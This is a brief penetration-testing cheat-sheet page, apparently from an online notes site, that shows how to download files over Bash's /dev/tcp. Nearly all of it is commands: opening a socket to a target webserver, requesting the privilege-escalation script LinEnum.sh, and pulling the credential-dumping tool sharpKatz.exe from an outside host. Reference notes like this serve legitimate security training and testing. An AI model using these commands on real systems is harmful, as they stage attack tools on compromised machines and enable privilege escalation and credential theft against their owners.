githubEdit

tcp

Download with Bash (/dev/tcp)

Connect to the target Webserver

exec 3<>/dev/tcp/10.10.10.32/80

HTTP get request

echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3

Print the response

cat <&3

TCP file download

cat < /dev/tcp/192.168.48.128/443 > sharpKatz.exe

Last updated